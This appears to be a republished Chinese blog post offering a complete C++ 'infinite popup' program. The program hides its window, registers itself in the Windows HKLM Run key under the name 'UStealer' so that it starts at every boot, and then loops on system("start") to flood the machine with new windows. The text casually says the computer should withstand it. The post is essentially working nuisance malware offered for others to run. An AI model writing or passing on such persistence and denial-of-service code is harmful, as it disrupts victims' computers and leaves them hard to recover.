当前位置:   article > 正文

无限弹窗-C++_c++无限弹窗代码

c++无限弹窗代码

设置了开机自启动,不过电脑应该扛得住,(作者已尝试)

#include<windows.h>
#include<conio.h>
#include<stdio.h>

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")

void HKRunator(char *programName)
{
    HKEY hkey=NULL;
    DWORD rc;

    rc=RegCreateKeyEx(HKEY_LOCAL_MACHINE,
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        0,
        NULL,
        REG_OPTION_NON_VOLATILE,
        KEY_ALL_ACCESS,
        NULL,
        &hkey,
        NULL);
 
    if (rc==ERROR_SUCCESS)   
    {
        rc=RegSetValueEx(hkey,
            "UStealer",
            0,
            REG_SZ,
            (const BYTE *)programName,
            strlen(programName));
        if (rc==ERROR_SUCCESS)
        {
            RegCloseKey(hkey);
        }
    }
    return;
}

int main(int argc,char **argv)
{

    HKRunator(*argv);

    if(MessageBox(NULL,"OK","Box",MB_YESNO)==IDNO)
    {
        return 0;
    }

    while(true)
    {
        system("start");
    }

    return 0;
}

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/凡人多烦事01/article/detail/301095
推荐阅读
相关标签
  

闽ICP备14008679号